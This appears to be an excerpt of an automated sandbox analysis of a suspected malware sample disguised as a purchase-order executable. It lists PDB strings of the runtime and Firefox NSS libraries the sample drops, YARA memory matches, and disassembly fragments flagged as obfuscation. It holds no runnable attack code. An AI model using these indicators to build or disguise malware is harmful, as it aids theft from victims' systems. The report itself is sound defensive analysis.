                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139597928.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7163552141.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: qipcap.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: msvcp140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: ucrtbase.pdbUGP source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
                    Source: Binary string: qipcap.pdb0 source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
                    Source: Binary string: D:\Kelly1076\__HITDisplay__\00_Code\ProArt Code_Git\ProArt\x64\Release\WMIMethod.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041264D4 push 0000001Bh; retf 1_2_041264E8
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04129508 pushad ; ret 1_2_04129509
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041235B8 push ebp; iretd 1_2_041235C2
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122694 push FFFFFFA5h; iretd 1_2_041226D8
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412478E push EB0001E7h; ret 1_2_04124793
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122FD1 pushad ; ret 1_2_04122FD7
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122171 push edx; iretd 1_2_0412225F
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122235 push edx; iretd 1_2_0412225F
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412631B push ss; iretd 1_2_0412631D
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412635C push esp; ret 1_2_04126373
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04123BAE push cs; retf 1_2_04123C32
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041233D9 pushfd ; ret 1_2_041233E5
                    Source: WMIMethod.dll.1.drStatic PE information: section name: _RDATA
                    Source: qipcap.dll.1.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.5.drStatic PE information: section name: .didat
